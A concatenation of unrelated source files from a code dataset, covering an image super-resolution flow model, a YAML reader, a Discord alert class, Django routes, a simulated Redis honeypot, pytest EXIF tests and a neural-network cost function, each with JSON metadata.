range(n_flow_step):\n self.additional_flow_steps.append(FlowStep(in_channels=num_channels-num_channels_split,\n cond_channels=RRDB_nf*num_features_condition,\n flow_permutation=opt['flow_permutation'],\n flow_coupling=opt['flow_coupling'], opt=opt))\n\n self.f = Conv2dZeros(RRDB_nf*num_features_condition, (num_channels-num_channels_split)*2)\n\n\n def forward(self, z, u, eps_std=None, logdet=0., reverse=False, training=True):\n # for image SR\n if self.SR:\n if not reverse:\n conditional_feature = self.get_conditional_feature_SR(u)\n\n for layer in self.additional_flow_steps:\n z, logdet = layer(z, u=conditional_feature, logdet=logdet, reverse=False)\n\n h = self.f(conditional_feature)\n mean, logs = thops.split_feature(h, \"cross\")\n logdet += GaussianDiag.logp(mean, logs, z)\n\n return logdet, conditional_feature\n\n else:\n conditional_feature = self.get_conditional_feature_SR(u)\n\n h = self.f(conditional_feature)\n mean, logs = thops.split_feature(h, \"cross\")\n z = GaussianDiag.sample(mean, logs, eps_std)\n\n for layer in reversed(self.additional_flow_steps):\n z, _ = layer(z, u=conditional_feature, reverse=True)\n\n return z, logdet, conditional_feature\n else:\n # for image rescaling\n if not reverse:\n conditional_feature = self.get_conditional_feature_Rescaling(u)\n\n for layer in self.additional_flow_steps:\n z, logdet = layer(z, u=conditional_feature, logdet=logdet, reverse=False)\n\n h = self.f(conditional_feature)\n mean, scale = thops.split_feature(h, \"cross\")\n logscale = 0.318 * torch.atan(2 * scale)\n z = (z - mean) * torch.exp(-logscale)\n\n return z, conditional_feature\n\n else:\n conditional_feature = self.get_conditional_feature_Rescaling(u)\n\n h = self.f(conditional_feature)\n mean, scale = thops.split_feature(h, \"cross\")\n logscale = 0.318 * torch.atan(2 * scale)\n z = GaussianDiag.sample(mean, logscale, eps_std)\n\n for layer in reversed(self.additional_flow_steps):\n z, _ = layer(z, u=conditional_feature, reverse=True)\n\n return z, conditional_feature\n\n\n def get_conditional_feature_SR(self, u):\n u_feature_first = self.conv_first(u)\n u_feature1 = self.RRDB_trunk0(u_feature_first)\n u_feature2 = self.trunk_conv1(self.RRDB_trunk1(u_feature1)) + u_feature_first\n\n return torch.cat([u_feature1, u_feature2], 1)\n\n def get_conditional_feature_Rescaling(self, u):\n u_feature_first 
= self.conv_first(u)\n u_feature = self.trunk_conv1(self.RRDB_trunk1(self.RRDB_trunk0(u_feature_first))) + u_feature_first\n\n return u_feature\n\n\n","repo_name":"JingyunLiang/HCFlow","sub_path":"codes/models/modules/ConditionalFlow.py","file_name":"ConditionalFlow.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"34"} +{"seq_id":"35849235361","text":"# coding: utf-8\n\n# This module contains abstractions for the input stream. You don't have to\n# looks further, there are no pretty code.\n#\n# We define two classes here.\n#\n# Mark(source, line, column)\n# It's just a record and its only use is producing nice error messages.\n# Parser does not use it for any other purposes.\n#\n# Reader(source, data)\n# Reader determines the encoding of `data` and converts it to unicode.\n# Reader provides the following methods and attributes:\n# reader.peek(length=1) - return the next `length` characters\n# reader.forward(length=1) - move the current position to `length`\n# characters.\n# reader.index - the number of the current character.\n# reader.line, stream.column - the line and the column of the current\n# character.\n\nimport codecs\n\nfrom pipenv.vendor.ruamel.yaml.error import YAMLError, FileMark, StringMark, YAMLStreamError\nfrom pipenv.vendor.ruamel.yaml.util import RegExp\n\nfrom typing import Any, Dict, Optional, List, Union, Text, Tuple, Optional # NOQA\n# from ruamel.compat import StreamTextType # NOQA\n\n__all__ = ['Reader', 'ReaderError']\n\n\nclass ReaderError(YAMLError):\n def __init__(\n self, name: Any, position: Any, character: Any, encoding: Any, reason: Any,\n ) -> None:\n self.name = name\n self.character = character\n self.position = position\n self.encoding = encoding\n self.reason = reason\n\n def __str__(self) -> Any:\n if isinstance(self.character, bytes):\n return (\n f\"'{self.encoding!s}' codec can't decode byte #x{ord(self.character):02x}: \"\n f'{self.reason!s}\\n'\n f' in \"{self.name!s}\", position {self.position:d}'\n )\n else:\n return (\n f'unacceptable character #x{self.character:04x}: {self.reason!s}\\n'\n f' in \"{self.name!s}\", position {self.position:d}'\n )\n\n\nclass Reader:\n # Reader:\n # - determines the data encoding and converts it to a unicode string,\n # - checks if characters are in allowed range,\n # - adds '\\0' to the end.\n\n # Reader accepts\n # - a `bytes` object,\n # - a `str` object,\n # - a file-like object with its `read` method returning `str`,\n # - a file-like object with its `read` method returning `unicode`.\n\n # Yeah, it's ugly and slow.\n\n def __init__(self, stream: Any, loader: Any = None) -> None:\n self.loader = loader\n if self.loader is not None and getattr(self.loader, '_reader', None) is None:\n self.loader._reader = self\n self.reset_reader()\n self.stream: Any = stream # as .read is called\n\n def reset_reader(self) -> None:\n self.name: Any = None\n self.stream_pointer = 0\n self.eof = True\n self.buffer = \"\"\n self.pointer = 0\n self.raw_buffer: Any = None\n self.raw_decode = None\n self.encoding: Optional[Text] = None\n self.index = 0\n self.line = 0\n self.column = 0\n\n @property\n def stream(self) -> Any:\n try:\n return self._stream\n except AttributeError:\n raise YAMLStreamError('input stream needs to be specified')\n\n @stream.setter\n def stream(self, val: Any) -> None:\n if val is None:\n return\n self._stream = None\n if isinstance(val, str):\n self.name = ''\n self.check_printable(val)\n self.buffer = val + '\\0'\n 
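In the image-rescaling branch of `ConditionalFlow` above, the predicted scale is squashed through `0.318 * atan(2 * scale)` before exponentiation. Since 0.318 is approximately 1/pi and atan is bounded by plus or minus pi/2, the log-scale is confined to roughly (-0.5, 0.5), so the multiplicative factor `exp(-logscale)` stays within about [0.61, 1.65] no matter what the network emits. A standalone check of that bound:

```python
import torch

# The bounded log-scale trick from the rescaling branch above:
# 0.318 ~ 1/pi and atan(.) lies in (-pi/2, pi/2), so logscale is in ~(-0.5, 0.5).
scale = torch.linspace(-1000.0, 1000.0, steps=9)
logscale = 0.318 * torch.atan(2 * scale)
assert logscale.abs().max() < 0.5
print(torch.exp(-logscale))  # every factor lies roughly in [0.61, 1.65]
```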
elif isinstance(val, bytes):\n self.name = ''\n self.raw_buffer = val\n self.determine_encoding()\n else:\n if not hasattr(val, 'read'):\n raise YAMLStreamError('stream argument needs to have a read() method')\n self._stream = val\n self.name = getattr(self.stream, 'name', '')\n self.eof = False\n self.raw_buffer = None\n self.determine_encoding()\n\n def peek(self, index: int = 0) -> Text:\n try:\n return self.buffer[self.pointer + index]\n except IndexError:\n self.update(index + 1)\n return self.buffer[self.pointer + index]\n\n def prefix(self, length: int = 1) -> Any:\n if self.pointer + length >= len(self.buffer):\n self.update(length)\n return self.buffer[self.pointer : self.pointer + length]\n\n def forward_1_1(self, length: int = 1) -> None:\n if self.pointer + length + 1 >= len(self.buffer):\n self.update(length + 1)\n while length != 0:\n ch = self.buffer[self.pointer]\n self.pointer += 1\n self.index += 1\n if ch in '\\n\\x85\\u2028\\u2029' or (\n ch == '\\r' and self.buffer[self.pointer] != '\\n'\n ):\n self.line += 1\n self.column = 0\n elif ch != '\\uFEFF':\n self.column += 1\n length -= 1\n\n def forward(self, length: int = 1) -> None:\n if self.pointer + length + 1 >= len(self.buffer):\n self.update(length + 1)\n while length != 0:\n ch = self.buffer[self.pointer]\n self.pointer += 1\n self.index += 1\n if ch == '\\n' or (ch == '\\r' and self.buffer[self.pointer] != '\\n'):\n self.line += 1\n self.column = 0\n elif ch != '\\uFEFF':\n self.column += 1\n length -= 1\n\n def get_mark(self) -> Any:\n if self.stream is None:\n return StringMark(\n self.name, self.index, self.line, self.column, self.buffer, self.pointer,\n )\n else:\n return FileMark(self.name, self.index, self.line, self.column)\n\n def determine_encoding(self) -> None:\n while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):\n self.update_raw()\n if isinstance(self.raw_buffer, bytes):\n if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):\n self.raw_decode = codecs.utf_16_le_decode # type: ignore\n self.encoding = 'utf-16-le'\n elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):\n self.raw_decode = codecs.utf_16_be_decode # type: ignore\n self.encoding = 'utf-16-be'\n else:\n self.raw_decode = codecs.utf_8_decode # type: ignore\n self.encoding = 'utf-8'\n self.update(1)\n\n NON_PRINTABLE = RegExp(\n '[^\\x09\\x0A\\x0D\\x20-\\x7E\\x85' '\\xA0-\\uD7FF' '\\uE000-\\uFFFD' '\\U00010000-\\U0010FFFF' ']' # NOQA\n )\n\n _printable_ascii = ('\\x09\\x0A\\x0D' + \"\".join(map(chr, range(0x20, 0x7F)))).encode('ascii')\n\n @classmethod\n def _get_non_printable_ascii(cls: Text, data: bytes) -> Optional[Tuple[int, Text]]: # type: ignore # NOQA\n ascii_bytes = data.encode('ascii') # type: ignore\n non_printables = ascii_bytes.translate(None, cls._printable_ascii) # type: ignore\n if not non_printables:\n return None\n non_printable = non_printables[:1]\n return ascii_bytes.index(non_printable), non_printable.decode('ascii')\n\n @classmethod\n def _get_non_printable_regex(cls, data: Text) -> Optional[Tuple[int, Text]]:\n match = cls.NON_PRINTABLE.search(data)\n if not bool(match):\n return None\n return match.start(), match.group()\n\n @classmethod\n def _get_non_printable(cls, data: Text) -> Optional[Tuple[int, Text]]:\n try:\n return cls._get_non_printable_ascii(data) # type: ignore\n except UnicodeEncodeError:\n return cls._get_non_printable_regex(data)\n\n def check_printable(self, data: Any) -> None:\n non_printable_match = self._get_non_printable(data)\n if non_printable_match is not None:\n start, 
character = non_printable_match\n position = self.index + (len(self.buffer) - self.pointer) + start\n raise ReaderError(\n self.name,\n position,\n ord(character),\n 'unicode',\n 'special characters are not allowed',\n )\n\n def update(self, length: int) -> None:\n if self.raw_buffer is None:\n return\n self.buffer = self.buffer[self.pointer :]\n self.pointer = 0\n while len(self.buffer) < length:\n if not self.eof:\n self.update_raw()\n if self.raw_decode is not None:\n try:\n data, converted = self.raw_decode(self.raw_buffer, 'strict', self.eof)\n except UnicodeDecodeError as exc:\n character = self.raw_buffer[exc.start]\n if self.stream is not None:\n position = self.stream_pointer - len(self.raw_buffer) + exc.start\n elif self.stream is not None:\n position = self.stream_pointer - len(self.raw_buffer) + exc.start\n else:\n position = exc.start\n raise ReaderError(self.name, position, character, exc.encoding, exc.reason)\n else:\n data = self.raw_buffer\n converted = len(data)\n self.check_printable(data)\n self.buffer += data\n self.raw_buffer = self.raw_buffer[converted:]\n if self.eof:\n self.buffer += '\\0'\n self.raw_buffer = None\n break\n\n def update_raw(self, size: Optional[int] = None) -> None:\n if size is None:\n size = 4096\n data = self.stream.read(size)\n if self.raw_buffer is None:\n self.raw_buffer = data\n else:\n self.raw_buffer += data\n self.stream_pointer += len(data)\n if not data:\n self.eof = True\n\n\n# try:\n# import psyco\n# psyco.bind(Reader)\n# except ImportError:\n# pass\n","repo_name":"pypa/pipenv","sub_path":"pipenv/vendor/ruamel/yaml/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":9940,"program_lang":"python","lang":"en","doc_type":"code","stars":24273,"dataset":"github-code","pt":"34"} +{"seq_id":"32055657355","text":"def sum_nums(nums):\n \"\"\"Given list of numbers, return sum of those numbers.\"\"\" \n\n sum = 0\n for i in nums:\n sum = sum + i\n\n return sum\n\nprint(\"sum_nums returned\", sum_nums([1, 2, 3, 4]))","repo_name":"chadsmith686/python-syntax","sub_path":"sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25336580730","text":"import discord\nimport settings\n\n\nclass NotImplementedError(Exception):\n pass\n\n\nclass Discord(discord.Client):\n async def on_ready(self):\n message = self.create_message(self.provider, self.link)\n if settings.DISCORD_SEND_CHANNEL:\n for guild in self.guilds:\n if guild.id == settings.DISCORD_GUILD_ID:\n self.guild = guild\n for channel in self.guild.text_channels:\n if channel.id == settings.DISCORD_CHANNEL_ID:\n self.channel = channel\n await self.channel.send(message)\n if settings.DISCORD_SEND_DM:\n user = await self.fetch_user(settings.DISCORD_USER)\n await user.send(message)\n\n\nclass Email:\n def alert_email(self, message):\n raise NotImplementedError\n\n\nclass Text:\n def alert_text(self, message):\n raise NotImplementedError\n\n\nclass Alert(Discord, Email, Text):\n def __init__(self, *args, **kwargs):\n self.provider = kwargs.pop(\"provider\")\n self.link = kwargs.pop(\"link\")\n super().__init__()\n\n def create_message(self, provider=None, link=None):\n return f\"Stock available at {provider}, more info here: {link}\"\n\n async def alert(self):\n if settings.SEND_DISCORD:\n await self.start(settings.DISCORD_TOKEN)\n if settings.SEND_EMAIL:\n self.alert_email()\n if settings.SEND_TEXT:\n 
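`determine_encoding` above decides between UTF-16-LE, UTF-16-BE, and a UTF-8 fallback purely from the byte-order mark at the start of the raw buffer. The same decision works as a standalone helper; a small sketch (`sniff_encoding` is an illustrative name, not part of ruamel):

```python
import codecs

def sniff_encoding(raw: bytes) -> str:
    # Mirror of the reader's BOM check: only the first two bytes matter,
    # and anything without a UTF-16 BOM falls back to UTF-8.
    if raw.startswith(codecs.BOM_UTF16_LE):
        return 'utf-16-le'
    if raw.startswith(codecs.BOM_UTF16_BE):
        return 'utf-16-be'
    return 'utf-8'

assert sniff_encoding(codecs.BOM_UTF16_LE + 'a: 1'.encode('utf-16-le')) == 'utf-16-le'
assert sniff_encoding(b'a: 1') == 'utf-8'
```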
self.alert_text()\n","repo_name":"JordanRClark/canada-ps5-stock-checker","sub_path":"ps5-stock-checker/alerts/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"42291949449","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'main'\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('projects/', views.projects, name='projects'),\n    path('crudtober/', views.crudtober, name='crudtober'),\n    path('lanyard/', views.lanyard, name='lanyard'),\n    path('reserved/', views.reserved, name='reserved')\n]\n","repo_name":"rayun56/rayun.dev-page","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"28347965876","text":"import datetime\nimport re\n\n\nclass RespHandler:\n    def __init__(self):\n        # dict used as temporary key-value storage\n        self.k_v_dict = {\n            \"admin\": \"12345\"\n        }\n\n        self.executable_command = {\n            \"ping\": (self.ping, True),\n            \"get\": (self.get, True),\n            \"set\": (self.set, True),\n            \"keys\": (self.keys, True),\n            \"auth\": (self.auth, True),\n            \"del\": (self.delete, True),\n            \"exists\": (self.exists, True),\n            \"dbsize\": (self.dbsize, True),\n            \"config\": (self.config, True)\n\n        }\n        self.unexecutable_command = [\n            \"hget\", \"hset\", \"hdel\", \"hlen\", \"hexists\", \"hkeys\", \"hvals\", \"hgetall\", \"hincrby\", \"hincrbyfloat\",\n            \"hstrlen\", \"shutdown\", \"expire\", \"expireat\", \"pexpire\", \"pexpireat\", \"ttl\", \"type\", \"rename\", \"renamenx\",\n            \"randomkey\", \"move\", \"dump\", \"restore\", \"migrate\", \"scan\", \"select\", \"flushdb\", \"flushall\", \"mset\", \"mget\",\n            \"incr\", \"decr\", \"append\", \"strlen\", \"getset\", \"setrange\", \"getrange\", \"rpush\", \"lpush\", \"linsert\", \"lrange\",\n            \"lindex\", \"llen\", \"rpop\", \"lpop\", \"lrem\", \"lset\", \"blpop\",\n\n        ]\n        self.max_num = 100\n\n    # parse the received command\n    def _parser(self, command):\n        command_list = command.split(\"\\r\\n\")\n        cache = {\n            \"cmd\": None,\n            \"params\": [],\n        }\n\n        command_list.pop()\n        for index in range(1, len(command_list), 2):\n            command = (command_list[index], command_list[index + 1])\n            if index == 1:\n                cache[\"cmd\"] = command\n            else:\n                cache[\"params\"].append(command)\n\n        return cache\n\n    # format the response data\n    def _format(self, result, error=False):\n        if error:\n            result_str = \"-\" + result + \"\\r\\n\"\n        else:\n            if type(result) == str:\n                result_str = \"+\" + result + \"\\r\\n\"\n            if type(result) == dict:\n                length = len(result)\n                result_str = \"*\" + str(length) + \"\\r\\n\"\n                for k, v in result.items():\n                    k_l = len(k)\n                    result_str += \"$\" + str(k_l) + \"\\r\\n\" + str(k) + \"\\r\\n\"\n            if type(result) == int:\n                if result == -1:\n                    result_str = \"$\" + str(result) + \"\\r\\n\"\n                else:\n                    result_str = \":\" + str(result) + \"\\r\\n\"\n\n        return result_str\n\n    # command handling engine\n    def handle_command(self, command):\n        cache = self._parser(command)\n        cmd = cache.get(\"cmd\")[1].lower()\n        # try:\n        if cmd in self.executable_command.keys():\n            if self.executable_command.get(cmd)[1]:\n                result, error = self.executable_command.get(cmd)[0](cache)\n            else:\n                result, error = self.finall_error()\n\n        elif cmd in self.unexecutable_command:\n            result, error = self.finall_error()\n        else:\n            result, error = self.normal_error(cache)\n        # except Exception:\n        #     result, error = self.finall_error()\n\n        result = self._format(result, 
error=error).encode(\"utf8\")\n        print(f\"result ==> {result}\")\n        return result\n\n    # executable commands\n    def ping(self, cache):\n        return \"PONG\", False\n\n    def get(self, cache):\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) == 1:\n            result = self.k_v_dict.get(params[0][1])\n            error = False\n            if result is None:\n                result = -1\n        else:\n            result, error = self._num_error(cmd)\n        print(f\"get ==> {result}\")\n        return result, error\n\n    def exists(self, cache):\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) >= 1:\n            result = 0\n            error = False\n            for param in params:\n                value = self.k_v_dict.get(param[1])\n                if value is not None:\n                    result += 1\n        else:\n            result, error = self._num_error(cmd)\n        print(f\"exists ==> {result}\")\n        return result, error\n\n    def dbsize(self, cache):\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) == 0:\n            result = len(self.k_v_dict)\n            error = False\n        else:\n            result, error = self._num_error(cmd)\n\n        print(f\"dbsize ==> {result}\")\n        return result, error\n\n    def set(self, cache):\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) < 2:\n            result, error = self._num_error(cmd)\n        elif len(params) == 2:\n            self.k_v_dict[params[0][1]] = params[1][1]\n            loss = len(self.k_v_dict) - self.max_num\n            if loss > 0:\n                c = list(self.k_v_dict.items())\n                self.k_v_dict = dict(c[loss:])\n            result = \"OK\"\n            error = False\n        else:\n            result = \"ERR syntax error\"\n            error = True\n        print(f\"set ==> {result}\")\n        return result, error\n\n    def keys(self, cache):\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) != 1:\n            result, error = self._num_error(cmd)\n        else:\n            res_str = params[0][1]\n            if res_str == \"*\":\n                res_str = \".*\"\n            key_list = self.k_v_dict.keys()\n            result = {}\n            error = False\n            for key in key_list:\n                if re.match(res_str, key):\n                    result[key] = self.k_v_dict.get(key)\n\n        print(f\"keys ==> {result}\")\n\n        return result, error\n\n    def delete(self, cache):\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) < 1:\n            result, error = self._num_error(cmd)\n        else:\n            count = 0\n            error = False\n            for param in params:\n                try:\n                    del(self.k_v_dict[param[1]])\n                    count += 1\n                except:\n                    continue\n\n            result = count\n\n        print(f\"delete ==> {result}\")\n        return result, error\n\n    def auth(self, cache):\n        error = True\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) < 1:\n            result, error = self._num_error(cmd)\n        elif len(params) == 1:\n            result = \"ERR AUTH called without any password configured for the default user. Are you sure your configuration is correct?\"\n            error = True\n        else:\n            result = \"WRONGPASS invalid username-password pair or user is disabled.\"\n\n        return result, error\n\n    # important monitored command: config\n    def config(self, cache):\n        # add instrumentation here\n        error = True\n        cmd = cache.get(\"cmd\")\n        params = cache.get(\"params\")\n        if len(params) < 1:\n            result, error = self._num_error(cmd)\n        else:\n            c = params[0][1].lower()\n            if c == \"help\":\n                result = \"\"\"1) CONFIG <subcommand> arg arg ... arg. Subcommands are:\n2) GET <pattern> -- Return parameters matching the glob-like <pattern> and their values.\n3) SET <parameter> <value> -- Set parameter to value.\n4) RESETSTAT -- Reset statistics reported by INFO.\n5) REWRITE -- Rewrite the configuration file.\"\"\"\n                error = False\n            else:\n                result = f\"ERR Unknown subcommand or wrong number of arguments for '{params[0][1]}'. 
Try CONFIG HELP\"\n                error = True\n\n        return result, error\n\n    # error messages\n    def _num_error(self, cmd):\n        error = True\n        return f\"ERR wrong number of arguments for '{cmd[1]}' command\", error\n\n    def normal_error(self, cache):\n        error = True\n        args_str = \"\"\n        for i in cache.get(\"params\"):\n            args_str += i[1] + \", \"\n        return f\"ERR unknown command `{cache.get('cmd')[1]}`, with args beginning with: {args_str}\", error\n\n    # error reply for the commands that are not implemented\n    def finall_error(self):\n        error = True\n        result = \"ERR Protocol error: invalid bulk length\"\n        return result, error\n\n\nif __name__ == '__main__':\n    a = RespHandler()\n    cmd = \"*2\\r\\n$3\\r\\ndel\\r\\n$5\\r\\nadmin\\r\\n\"\n    print(a.handle_command(cmd))\n\n","repo_name":"SSRemex/silumation_redis_honeypot","sub_path":"resp.py","file_name":"resp.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"21363171062","text":"# pylint: disable=redefined-outer-name\n# pylint: disable=protected-access\n'''test GetExifData'''\n\nimport json\nimport os\n\nimport boto3\nimport jsonschema\nimport exifread\nimport moto\nimport pytest\n\nfrom dataclasses import asdict\n\nfrom common.test.aws import create_lambda_function_context\n\nos.environ['CROSS_ACCOUNT_IAM_ROLE_ARN'] = 'arn:aws:iam::123456789012:role/PhotoOpsAI/CrossAccountAccess'\nimport src.handlers.GetExifData.function as func\n\n\nDATA_DIR = './data'\nEVENT_DIR = os.path.join(DATA_DIR, 'events')\nSCHEMA_DIR = os.path.join(DATA_DIR, 'schemas')\nIMAGE_DIR = os.path.join(DATA_DIR, 'images')\nMODEL_DIR = os.path.join(DATA_DIR, 'models')\n\n### Events\n@pytest.fixture()\ndef context():\n    '''context object'''\n    return create_lambda_function_context('GetExifData')\n\n@pytest.fixture(params=[\n    'test_image_nikon.NEF',\n    'test_image_lightroom_nikon.jpg',\n    'test_image_lightroom_nikon.dng',\n    'test_image_lightroom_nikon_embedded_raw.dng',\n    'test_image_lightroom_nikon.tif',\n])\ndef image_name(request):\n    '''Return an image file name'''\n    return request.param\n\n\n@pytest.fixture(params=['GetExifData-event-eb.json'])\ndef event(request, image_name):\n    '''Return a test event'''\n    with open(os.path.join(EVENT_DIR, request.param)) as f:\n        j = json.load(f)\n        j['Records'][0]['s3']['object']['key'] = 'images/{}'.format(image_name)\n    return j\n\n\n@pytest.fixture()\ndef event_schema():\n    '''Return an event schema'''\n    with open(os.path.join(SCHEMA_DIR, 's3-notification.schema.json')) as f:\n        return json.load(f)\n\n\n@pytest.fixture()\ndef image(image_name):\n    '''Return an image file object'''\n    return open(os.path.join(IMAGE_DIR, image_name), 'rb')\n\n\n@pytest.fixture()\ndef s3_bucket_name(event):\n    '''S3 bucket name'''\n    return event['Records'][0]['s3']['bucket']['name']\n\n\n@pytest.fixture()\ndef s3_object_key(event):\n    '''S3 object key'''\n    return event['Records'][0]['s3']['object']['key']\n\n\n@pytest.fixture()\ndef expected_response(image_name):\n    '''Return an expected response'''\n    file_name = 'GetExifData-output-{}.json'.format(image_name)\n    with open(os.path.join(EVENT_DIR, file_name)) as f:\n        return json.load(f)\n\n\n@pytest.fixture()\ndef response_schema():\n    '''Return a response schema'''\n    with open(os.path.join(SCHEMA_DIR, 'GetExifDataResponse.schema.json')) as f:\n        return json.load(f)\n\n\n@pytest.fixture()\ndef item_schema():\n    '''Return an item schema'''\n    with open(os.path.join(SCHEMA_DIR, 'ExifDataItem.schema.json')) as f:\n        return json.load(f)\n\n\n@pytest.fixture()\ndef data_schema():\n    '''Return a data 
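The framing that `RespHandler._parser` above expects is a RESP array of bulk strings: a `*<count>` header, then a `$<length>`/payload pair per element, each terminated by `\r\n`. A worked example of how one inline command decomposes:

```python
# Worked example of the RESP framing handled by RespHandler._parser:
#   "*2"           -> array of two bulk strings follows
#   "$3" / "get"   -> first bulk string (3 bytes): the command
#   "$5" / "admin" -> second bulk string (5 bytes): one parameter
handler = RespHandler()
cache = handler._parser("*2\r\n$3\r\nget\r\n$5\r\nadmin\r\n")
print(cache)  # {'cmd': ('$3', 'get'), 'params': [('$5', 'admin')]}
```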
schema'''\n with open(os.path.join(SCHEMA_DIR, 'ExifData.schema.json')) as f:\n return json.load(f)\n\n\n### AWS clients\n@pytest.fixture()\ndef aws_credentials():\n '''Mock credentials to prevent accidentally escaping our mock'''\n os.environ['AWS_ACCESS_KEY_ID'] = 'testing'\n os.environ['AWS_SECRET_ACCESS_KEY'] = 'testing'\n os.environ['AWS_SECURITY_TOKEN'] = 'testing'\n os.environ['AWS_SESSION_TOKEN'] = 'testing'\n\n\n@moto.mock_sts\n@pytest.fixture()\ndef session(aws_credentials):\n '''AWS Session fixture'''\n return boto3.Session()\n\n\n@moto.mock_s3\n@pytest.fixture()\ndef s3_client(session):\n '''S3 client fixture'''\n return session.client('s3')\n\n\n# Data validation\ndef test_validate_event(event, event_schema):\n '''Test event data against schema'''\n jsonschema.validate(event, event_schema)\n\n\ndef test_validate_expected_response(expected_response, response_schema):\n '''Test response against schema'''\n jsonschema.validate(expected_response, response_schema)\n\n\ndef test_validate_expected_item(expected_response, item_schema):\n '''Test response data against schema'''\n jsonschema.validate(expected_response.get('Item'), item_schema)\n\n\ndef test_validate_expected_data(expected_response, data_schema):\n '''Test response data against schema'''\n jsonschema.validate(expected_response.get('Item', {}).get('exif'), data_schema)\n\n\n### Tests\n@moto.mock_s3\ndef test_handler(event, image, expected_response, s3_client, s3_bucket_name, s3_object_key, context, mocker):\n '''Call handler'''\n mocker.patch(\n 'src.handlers.GetExifData.function._get_cross_account_s3_client',\n return_value=s3_client\n )\n s3_client.create_bucket(Bucket=s3_bucket_name)\n\n # FIXME: How do we handle pictures\n image.seek(0)\n s3_client.upload_fileobj(image, s3_bucket_name, s3_object_key)\n # FIXME: Looks like exifread closes JPGs biut not others. 
Should figure that out.\n    #image.seek(0)\n\n    resp = func.handler(event, context)\n    assert resp == expected_response\n","repo_name":"ServerlessOpsIO/PhotoOps","sub_path":"tests/unit/src/handlers/GetExifData/test_function.py","file_name":"test_function.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"41619796416","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nimport scipy.optimize as opt\nfrom sklearn.metrics import classification_report\nimport Sigmoid as sg\n\n\ndef load_mat(path):\n    data = loadmat(path)\n    X = data['X']\n    y = data['y']\n    y = y.flatten()\n\n    return X, y\n\n\ndef load_weight():\n    weight = loadmat('ex4weights.mat')\n    theta1 = weight['Theta1']\n    theta2 = weight['Theta2']\n\n    return theta1, theta2\n\n\ndef plot_data(X):\n    '''plot 100 randomly chosen digits'''\n    index = np.random.choice(range(5000),\n                             100)  # np.random.choice(arrange,size) returns an ndarray\n    images = X[index]  # randomly select 100 samples\n    fig, ax_array = plt.subplots(\n        10, 10, sharex=True, sharey=True, figsize=(8, 8))  # ax_array is an array of Axes objects\n    for r in range(10):\n        for c in range(10):\n            ax_array[r, c].matshow(\n                images[r * 10 + c].reshape(20, 20), cmap='gray_r'\n            )  # matshow() displays an array as a matrix in a new figure window\n    plt.yticks([])\n    plt.xticks([])\n    plt.show()\n\n\ndef expand_y(y):\n    result = []\n    for i in y:\n        y_array = np.zeros(10)\n        y_array[i - 1] = 1\n        result.append(y_array)\n    return np.array(result)\n\n\ndef feed_forward(theta1, theta2, X):\n    z2 = X @ theta1.T\n    a2 = sg.sigmoid(z2)  #(5000,25)\n    a2 = np.insert(a2, 0, 1, axis=1)  #(5000,26)\n    z3 = a2 @ theta2.T\n    a3 = sg.sigmoid(z3)\n\n    return z2, a2, z3, a3\n\n\ndef cost(theta1, theta2, X, y):\n    z2, a2, z3, h = feed_forward(theta1, theta2, X)\n    # here y is a matrix, not a vector\n    first = -y * np.log(h)\n    second = (1 - y) * np.log(1 - h)\n\n    return (np.sum(first - second)) / len(X)  # cannot use np.mean() here, the result would be off by a factor of 10\n    '''\n    # or use loop\n    for i in range(len(X)):\n        first = - y[i] * np.log(h[i])\n        second = (1 - y[i]) * np.log(1 - h[i])\n        J = J + np.sum(first - second)\n    J = J / len(X)\n    return J\n    '''\n\n\ndef cost_reg(theta1, theta2, X, y, lmd):\n    c = cost(theta1, theta2, X, y)\n    reg = (lmd / (2 * len(X))) * (\n        np.sum(theta1[:, 1:]**2) + np.sum(theta2[:, 1:]**2))\n    return reg + c\n\n\ndef main():\n    path = 'ex4data1.mat'\n    X, y = load_mat(path)\n    X = np.insert(X, 0, 1, axis=1)\n    y = expand_y(y)\n    theta1, theta2 = load_weight()\n    print(cost_reg(theta1, theta2, X, y, 1))  #0.38376985909092354\n    \n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"scp-1024/Coursera-ML-Ng","sub_path":"Exercise 4-backpropagation/feedForward.py","file_name":"feedForward.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
